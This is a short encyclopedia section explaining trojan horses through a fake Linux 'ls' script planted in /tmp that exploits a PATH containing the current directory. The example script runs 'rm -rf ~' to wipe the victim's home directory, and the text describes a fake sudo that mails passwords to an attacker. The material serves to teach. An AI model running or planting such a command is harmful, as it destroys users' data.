Editing Trojan horse (computing) (section)

==Linux ls example==
A trojan horse is a [[Computer program|program]] that purports to perform some legitimate function, yet upon execution it compromises the user's security.<ref name="Wood1985"/> One simple example<ref name="CETS2023"/> is the following malicious version of the Linux [[ls]] command. An attacker would place this executable script in a publicly writable and "high-traffic" location (e.g., <code>/tmp/ls</code>). Then, any victim who tried to run <code>ls</code> from that directory — ''if and only if'' the victim's executable search <code>PATH</code> unwisely<ref name="CETS2023"/> included the current directory <code>.</code> — would execute <code>/tmp/ls</code> instead of <code>/usr/bin/ls</code>, and have their home directory deleted.
<syntaxhighlight lang="sh">
#!/usr/bin/env bash
rm -rf ~ 2>/dev/null # Remove the user's home directory, then remove self.
rm $0
</syntaxhighlight>
Similar scripts could hijack other common commands; for example, a script purporting to be the [[sudo]] command (which prompts for the user's password) could instead mail that password to the attacker.<ref name="Wood1985"/>

In these examples, the malicious program imitates the name of a well-known useful program, rather than pretending to be a novel and unfamiliar (but harmless) program. As such, these examples also resemble [[typosquatting]] and [[supply chain attack]]s.